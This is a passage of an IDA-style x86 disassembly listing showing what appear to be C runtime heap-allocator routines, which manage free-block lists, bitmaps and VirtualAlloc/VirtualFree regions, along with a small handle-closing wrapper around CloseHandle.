mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41A3D4
; ---------------------------------------------------------------------------
loc_41A3BA: ; CODE XREF: sub_41A27A+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41A3D4
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41A3D4: ; CODE XREF: sub_41A27A+11D�j
; sub_41A27A+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41A3EC: ; CODE XREF: sub_41A27A+112�j
mov esi, [ebp+arg_4]
jmp short loc_41A3F4
; ---------------------------------------------------------------------------
loc_41A3F1: ; CODE XREF: sub_41A27A+E2�j
mov ebx, [ebp+arg_0]
loc_41A3F4: ; CODE XREF: sub_41A27A+175�j
cmp [ebp+var_C], 0
jnz short loc_41A402
cmp ebx, edx
jz loc_41A482
loc_41A402: ; CODE XREF: sub_41A27A+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41A482
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_41A459
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A448
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41A448: ; CODE XREF: sub_41A27A+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41A482
; ---------------------------------------------------------------------------
loc_41A459: ; CODE XREF: sub_41A27A+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A46F
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41A46F: ; CODE XREF: sub_41A27A+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41A482: ; CODE XREF: sub_41A27A+182�j
; sub_41A27A+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41A58D
mov eax, dword_482964
test eax, eax
jz loc_41A57F
mov ecx, dword_48297C
mov esi, dword_422190
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_48297C
mov eax, dword_482964
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_482964
mov eax, [eax+10h]
mov ecx, dword_48297C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_482964
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_482964
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41A510
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_482964
loc_41A510: ; CODE XREF: sub_41A27A+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41A57F
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_482964
push dword ptr [eax+10h]
push 0
push dword_482980
call dword_422058 ; RtlFreeHeap
mov eax, dword_482968
mov edx, dword_48296C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_482964
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41F060
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_482968
cmp eax, dword_482964
jbe short loc_41A575
sub [ebp+arg_0], 14h
loc_41A575: ; CODE XREF: sub_41A27A+2F5�j
mov eax, dword_48296C
mov dword_482974, eax
loc_41A57F: ; CODE XREF: sub_41A27A+223�j
; sub_41A27A+29A�j
mov eax, [ebp+arg_0]
mov dword_482964, eax
mov dword_48297C, edi
loc_41A58D: ; CODE XREF: sub_41A27A+216�j
pop ebx
loc_41A58E: ; CODE XREF: sub_41A27A+37�j
pop edi
pop esi
leave
retn
sub_41A27A endp
; =============== S U B R O U T I N E =======================================
sub_41A592 proc near ; CODE XREF: sub_41AA2E+150�p
mov eax, dword_482968
mov ecx, dword_482978
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41A5D8
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_48296C
push edi
push dword_482980
call dword_42215C ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_41A5C7
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41A5C7: ; CODE XREF: sub_41A592+2F�j
add dword_482978, 10h
mov dword_48296C, eax
mov eax, dword_482968
loc_41A5D8: ; CODE XREF: sub_41A592+10�j
mov ecx, dword_48296C
push esi
push 41C4h
push 8
push dword_482980
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call dword_42205C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_41A603
loc_41A5FF: ; CODE XREF: sub_41A592+9B�j
xor eax, eax
jmp short loc_41A646
; ---------------------------------------------------------------------------
loc_41A603: ; CODE XREF: sub_41A592+6B�j
push 4
push 2000h
push 100000h
push edi
call dword_422194 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41A62F
push dword ptr [esi+10h]
push edi
push dword_482980
call dword_422058 ; RtlFreeHeap
jmp short loc_41A5FF
; ---------------------------------------------------------------------------
loc_41A62F: ; CODE XREF: sub_41A592+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_482968
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41A646: ; CODE XREF: sub_41A592+6F�j
pop esi
pop edi
retn
sub_41A592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A649 proc near ; CODE XREF: sub_41AA2E+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_41A661
; ---------------------------------------------------------------------------
loc_41A65E: ; CODE XREF: sub_41A649+1A�j
shl eax, 1
inc ebx
loc_41A661: ; CODE XREF: sub_41A649+13�j
test eax, eax
jge short loc_41A65E
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_41A67A: ; CODE XREF: sub_41A649+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41A67A
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_422194 ; VirtualAlloc
test eax, eax
jnz short loc_41A6AD
or eax, 0FFFFFFFFh
jmp loc_41A74A
; ---------------------------------------------------------------------------
loc_41A6AD: ; CODE XREF: sub_41A649+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_41A6FD
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_41A6C5: ; CODE XREF: sub_41A649+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_41A6C5
mov edx, [ebp+var_4]
loc_41A6FD: ; CODE XREF: sub_41A649+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41A73A
or [eax+4], edi
loc_41A73A: ; CODE XREF: sub_41A649+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41A74A: ; CODE XREF: sub_41A649+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A74F proc near ; CODE XREF: sub_417003+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_41A8F1
test bl, 1
jnz loc_41A8EA
add ebx, ecx
cmp esi, ebx
jg loc_41A8EA
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41A7C4
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41A7C4: ; CODE XREF: sub_41A74F+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41A80F
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_41A7F0
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41A80F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A80F
; ---------------------------------------------------------------------------
loc_41A7F0: ; CODE XREF: sub_41A74F+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A80F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A80F: ; CODE XREF: sub_41A74F+7B�j
; sub_41A74F+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41A8D8
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_41A849
push 3Fh
pop edi
loc_41A849: ; CODE XREF: sub_41A74F+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41A8C6
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_41A89D
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A895
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41A895: ; CODE XREF: sub_41A74F+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_41A8BD
; ---------------------------------------------------------------------------
loc_41A89D: ; CODE XREF: sub_41A74F+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A8B3
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41A8B3: ; CODE XREF: sub_41A74F+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_41A8BD: ; CODE XREF: sub_41A74F+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41A8C6: ; CODE XREF: sub_41A74F+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41A8DB
; ---------------------------------------------------------------------------
loc_41A8D8: ; CODE XREF: sub_41A74F+DE�j
mov edx, [ebp+arg_4]
loc_41A8DB: ; CODE XREF: sub_41A74F+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41AA26
; ---------------------------------------------------------------------------
loc_41A8EA: ; CODE XREF: sub_41A74F+50�j
; sub_41A74F+5A�j
xor eax, eax
jmp loc_41AA29
; ---------------------------------------------------------------------------
loc_41A8F1: ; CODE XREF: sub_41A74F+47�j
jge loc_41AA26
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_41A91C
push 3Fh
pop esi
loc_41A91C: ; CODE XREF: sub_41A74F+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_41A9A6
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A935
push 3Fh
pop esi
loc_41A935: ; CODE XREF: sub_41A74F+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41A97F
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41A960
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41A97C
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A97C
; ---------------------------------------------------------------------------
loc_41A960: ; CODE XREF: sub_41A74F+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A97C
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A97C: ; CODE XREF: sub_41A74F+208�j
; sub_41A74F+20F�j ...
mov ebx, [ebp+arg_4]
loc_41A97F: ; CODE XREF: sub_41A74F+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A9A6
push 3Fh
pop esi
loc_41A9A6: ; CODE XREF: sub_41A74F+1D1�j
; sub_41A74F+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41AA1D
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_41A9F4
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A9EC
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41A9EC: ; CODE XREF: sub_41A74F+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_41AA14
; ---------------------------------------------------------------------------
loc_41A9F4: ; CODE XREF: sub_41A74F+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41AA0A
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41AA0A: ; CODE XREF: sub_41A74F+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_41AA14: ; CODE XREF: sub_41A74F+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41AA1D: ; CODE XREF: sub_41A74F+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41AA26: ; CODE XREF: sub_41A74F+196�j
; sub_41A74F:loc_41A8F1�j
xor eax, eax
inc eax
loc_41AA29: ; CODE XREF: sub_41A74F+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A74F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA2E proc near ; CODE XREF: sub_416D78+2D�p
; sub_417003+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_482968
mov edx, dword_48296C
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_41AA6B
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41AA78
; ---------------------------------------------------------------------------
loc_41AA6B: ; CODE XREF: sub_41AA2E+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_41AA78: ; CODE XREF: sub_41AA2E+3B�j
mov eax, dword_482974
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_41AA9A
; ---------------------------------------------------------------------------
loc_41AA86: ; CODE XREF: sub_41AA2E+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AA9F
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_41AA9A: ; CODE XREF: sub_41AA2E+56�j
mov [ebp+arg_0], ebx
jb short loc_41AA86
loc_41AA9F: ; CODE XREF: sub_41AA2E+64�j
cmp ebx, [ebp+var_4]
jnz short loc_41AAC8
mov ebx, edx
jmp short loc_41AAB9
; ---------------------------------------------------------------------------
loc_41AAA8: ; CODE XREF: sub_41AA2E+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AAC0
add ebx, 14h
loc_41AAB9: ; CODE XREF: sub_41AA2E+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41AAA8
loc_41AAC0: ; CODE XREF: sub_41AA2E+86�j
cmp ebx, eax
jz loc_41AB5C
loc_41AAC8: ; CODE XREF: sub_41AA2E+74�j
; sub_41AA2E+170�j
mov dword_482974, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41AAEF
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AB25
loc_41AAEF: ; CODE XREF: sub_41AA2E+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41AB22
loc_41AB0B: ; CODE XREF: sub_41AA2E+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_41AB0B
loc_41AB22: ; CODE XREF: sub_41AA2E+DB�j
mov edx, [ebp+var_4]
loc_41AB25: ; CODE XREF: sub_41AA2E+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_41ABAE
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_41ABAE
; ---------------------------------------------------------------------------
loc_41AB50: ; CODE XREF: sub_41AA2E+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_41AB61
add ebx, 14h
mov [ebp+arg_0], ebx
loc_41AB5C: ; CODE XREF: sub_41AA2E+94�j
cmp ebx, [ebp+var_4]
jb short loc_41AB50
loc_41AB61: ; CODE XREF: sub_41AA2E+126�j
cmp ebx, [ebp+var_4]
jnz short loc_41AB8C
mov ebx, edx
jmp short loc_41AB73
; ---------------------------------------------------------------------------
loc_41AB6A: ; CODE XREF: sub_41AA2E+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_41AB7A
add ebx, 14h
loc_41AB73: ; CODE XREF: sub_41AA2E+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41AB6A
loc_41AB7A: ; CODE XREF: sub_41AA2E+140�j
cmp ebx, eax
jnz short loc_41AB8C
call sub_41A592
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41ABA4
loc_41AB8C: ; CODE XREF: sub_41AA2E+136�j
; sub_41AA2E+14E�j
push ebx
call sub_41A649
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_41AAC8
loc_41ABA4: ; CODE XREF: sub_41AA2E+15C�j
xor eax, eax
jmp loc_41AD25
; ---------------------------------------------------------------------------
loc_41ABAB: ; CODE XREF: sub_41AA2E+182�j
shl ecx, 1
inc edi
loc_41ABAE: ; CODE XREF: sub_41AA2E+111�j
; sub_41AA2E+120�j
test ecx, ecx
jge short loc_41ABAB
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_41ABCF
push 3Fh
pop esi
loc_41ABCF: ; CODE XREF: sub_41AA2E+19C�j
cmp esi, edi
jz loc_41ACD8
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41AC3B
cmp edi, 20h
mov ebx, 80000000h
jge short loc_41AC0F
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41AC38
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_41AC3B
; ---------------------------------------------------------------------------
loc_41AC0F: ; CODE XREF: sub_41AA2E+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41AC38
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41AC3B
; ---------------------------------------------------------------------------
loc_41AC38: ; CODE XREF: sub_41AA2E+1D5�j
; sub_41AA2E+1FD�j
mov ebx, [ebp+arg_0]
loc_41AC3B: ; CODE XREF: sub_41AA2E+1AF�j
; sub_41AA2E+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41ACE4
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41ACD5
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_41ACAC
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41AC9A
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41AC9A: ; CODE XREF: sub_41AA2E+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41ACD5
; ---------------------------------------------------------------------------
loc_41ACAC: ; CODE XREF: sub_41AA2E+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41ACBF
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41ACBF: ; CODE XREF: sub_41AA2E+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41ACD5: ; CODE XREF: sub_41AA2E+247�j
; sub_41AA2E+27C�j
mov ecx, [ebp+var_8]
loc_41ACD8: ; CODE XREF: sub_41AA2E+1A3�j
test ecx, ecx
jz short loc_41ACE7
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41ACE7
; ---------------------------------------------------------------------------
loc_41ACE4: ; CODE XREF: sub_41AA2E+223�j
mov ecx, [ebp+var_8]
loc_41ACE7: ; CODE XREF: sub_41AA2E+2AC�j
; sub_41AA2E+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41AD1D
cmp ebx, dword_482964
jnz short loc_41AD1D
mov ecx, [ebp+var_4]
cmp ecx, dword_48297C
jnz short loc_41AD1D
and dword_482964, 0
loc_41AD1D: ; CODE XREF: sub_41AA2E+2D3�j
; sub_41AA2E+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41AD25: ; CODE XREF: sub_41AA2E+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AA2E endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41AD78 proc near ; CODE XREF: sub_416DF3+1F�p
; sub_417003+150�p ...
arg_0 = dword ptr 4
mov eax, dword_481330
test eax, eax
jz short loc_41AD90
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AD90
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AD90: ; CODE XREF: sub_41AD78+7�j
; sub_41AD78+12�j
xor eax, eax
retn
sub_41AD78 endp
; =============== S U B R O U T I N E =======================================
sub_41AD93 proc near ; CODE XREF: sub_41AE16+4C�p
; sub_41F8F5+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41F57B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41ADE1
cmp esi, 1
jz short loc_41ADAF
cmp esi, 2
jnz short loc_41ADC5
loc_41ADAF: ; CODE XREF: sub_41AD93+15�j
push 2
call sub_41F57B
push 1
mov edi, eax
call sub_41F57B
cmp eax, edi
pop ecx
pop ecx
jz short loc_41ADE1
loc_41ADC5: ; CODE XREF: sub_41AD93+1A�j
push esi
call sub_41F57B
pop ecx
push eax
call dword_42202C ; CloseHandle
test eax, eax
jnz short loc_41ADE1
call dword_422008 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_41ADE3
; ---------------------------------------------------------------------------
loc_41ADE1: ; CODE XREF: sub_41AD93+10�j
; sub_41AD93+30�j ...
xor edi, edi
loc_41ADE3: ; CODE XREF: sub_41AD93+4C�j
push esi
call sub_41F4FC
mov eax, esi
sar eax, 5
mov eax, dword_481600[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_41AE11
push edi
call sub_41B9B7
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41AE13
; ---------------------------------------------------------------------------
loc_41AE11: ; CODE XREF: sub_41AD93+70�j
xor eax, eax
loc_41AE13: ; CODE XREF: sub_41AD93+7C�j
pop edi
pop esi
retn
sub_41AD93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE16 proc near ; CODE XREF: sub_416E31+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041AE95 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C0B0
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815F0
